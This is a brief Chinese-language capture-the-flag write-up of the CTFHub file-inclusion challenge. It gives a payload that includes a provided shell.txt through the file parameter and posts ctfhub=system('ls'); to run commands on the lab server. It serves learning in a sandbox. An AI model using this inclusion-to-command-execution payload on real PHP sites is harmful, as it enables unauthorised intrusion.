CTFHUB 文件包含
ctfhub RCE 文件包含 write up
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsICM38FdsYkRGZkRG9lcvx2bjxiNx8VZ6l2cs0zaXllc5YVYoVjMMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnLwQDOxETNzITM3EjNwAjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
审计一下代码,铁铁们可以百度一下strpos()的漏洞哦
#函数查找字符串在另一字符串中第一次出现的位置(区分大小写)
strpos("You love php, I love php too!","php");
“我有一个shell,怎么用?” 这个是题目给的包含文件
#request = post + get
于是构造payload,往ctfhub里传参
http://challenge-2bfb323ac5bd651f.sandbox.ctfhub.com:10080?file=shell.txt
post:ctfhub=system(‘ls’);
取走旗子,请大牛轻喷## ctfhub